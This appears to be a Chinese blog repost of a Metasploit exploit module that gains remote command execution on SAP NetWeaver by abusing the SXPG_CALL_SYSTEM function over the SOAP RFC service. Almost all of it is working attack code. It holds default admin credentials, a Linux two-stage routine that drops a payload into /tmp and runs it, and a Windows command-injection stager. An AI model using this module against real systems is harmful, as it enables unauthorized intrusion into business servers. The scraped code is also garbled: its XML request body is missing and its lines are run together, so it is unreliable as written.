本文共 6374 字，大约阅读时间需要 21 分钟。

### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##### This module is based on, inspired by, or is a port of a plugin available in# the Onapsis Bizploit Opensource ERP Penetration Testing framework -# http://www.onapsis.com/research-free-solutions.php.# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts# in producing the Metasploit modules and was happy to share his knowledge and# experience - a very cool guy.## The following guys from ERP-SCAN deserve credit for their contributions -# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and# Dmitry Evdokimov.## I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis# who have Beta tested the modules and provided excellent feedback. Some people# just seem to enjoy hacking SAP :)##require 'msf/core'class Metasploit4 < Msf::Exploit::Remote  Rank = GreatRanking  include Msf::Exploit::CmdStagerVBS  include Msf::Exploit::EXE  include Msf::Exploit::Remote::HttpClient  def initialize    super(      'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution',      'Description' => %q{          This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP        RFC Service, to execute remote commands. This module needs SAP credentials with        privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested        successfully on Windows 2008 64 bits and Linux 64 bits platforms.      },      'References' =>        [          [ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]        ],      'DisclosureDate' => 'Mar 26 2013',      'Platform'       => ['win', 'unix'],      'Targets' => [        [ 'Linux',          {            'Arch'     => ARCH_CMD,            'Platform' => 'unix'            #'Payload'  =>              #{                #'DisableNops' => true,                #'Space'       => 232,                #'Compat'      =>                  #{                    #'PayloadType' => 'cmd',                    #'RequiredCmd' => 'perl ruby',                  #}              #}          }        ],        [ 'Windows x64',          {            'Arch' => ARCH_X86_64,            'Platform' => 'win'          }        ]      ],      'DefaultTarget' => 0,      'Privileged' => false,      'Author' =>        [          'nmonkee'        ],      'License' => MSF_LICENSE    )    register_options(      [        Opt::RPORT(8000),        OptString.new('CLIENT', [true, 'SAP Client', '001']),        OptString.new('USERNAME', [true, 'Username', 'SAP*']),        OptString.new('PASSWORD', [true, 'Password', '06071992'])      ], self.class)    register_advanced_options(      [        OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]),      ], self.class)  end  def send_soap_request(data)    res = send_request_cgi({      'uri' => '/sap/bc/soap/rfc',      'method' => 'POST',      'data' => data,      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),      'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],      'ctype' => 'text/xml; charset=UTF-8',      'headers' => {        'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',      },      'vars_get' => {        'sap-client' => datastore['CLIENT'],        'sap-language' => 'EN'      }    })    return res  end  def build_soap_request(command, sap_command, sap_os)    data = "
   "    data << "
   
    "    data << "
    
     "    data << "
     
      "    data << "
      
       #{command}
      "    data << "
      
       #{sap_command}
      "    data << "
      
       #{sap_os}
      "    data << "
      
       
      "    data << "
     "    data << "
    "    data << "
   "    return data  end  def check    data = rand_text_alphanumeric(4 + rand(4))    res = send_soap_request(data)    if res and res.code == 500 and res.body =~ /faultstring/      return Exploit::CheckCode::Detected    end    return Exploit::CheckCode::Safe  end  def exploit    if target.name =~ /Windows/      linemax = datastore['PAYLOAD_SPLIT']      vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250      print_status("#{rhost}:#{rport} - Sending SOAP SXPG_CALL_SYSTEM request")      execute_cmdstager({ :delay => 0.35, :linemax => linemax })    elsif target.name =~ /Linux/      file = rand_text_alphanumeric(5)      stage_one = create_unix_payload(1,file)      print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")      res = send_soap_request(stage_one)      if res and res.code == 200 and res.body =~ /External program terminated/        print_good("#{rhost}:#{rport} - Payload dump was successful")      else        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")      end      stage_two = create_unix_payload(2,file)      print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")      send_soap_request(stage_two)    end  end  def create_unix_payload(stage, file)    command = ""    if target.name =~ /Linux/      if stage == 1        my_payload = payload.encoded.gsub(" ","\t")        my_payload.gsub!("&","&")        my_payload.gsub!("<","<")        command = "-o /tmp/" + file + " -n pwnie" + "\n!"        command << my_payload        command << "\n"      elsif stage == 2        command = "-ic /tmp/" + file      end    end    return build_soap_request(command.to_s, "DBMCLI", "ANYOS")  end  def execute_command(cmd, opts)    command = cmd.gsub(/&/, "&")    command.gsub!(/%TEMP%\\/, "")    data = build_soap_request("&#{command}", "LIST_DB2DUMP", "ANYOS")    begin      res = send_soap_request(data)      if res and res.code == 200        return      else        if res and res.body =~ /faultstring/          error = res.body.scan(%r{
   
    (.*?)
   })          0.upto(error.length-1) do |i|            vprint_error("#{rhost}:#{rport} - Error #{error[i]}")          end        end        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command")      end    rescue ::Rex::ConnectionError      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect")    end  endend

转载地址：http://qzemb.baihongyu.com/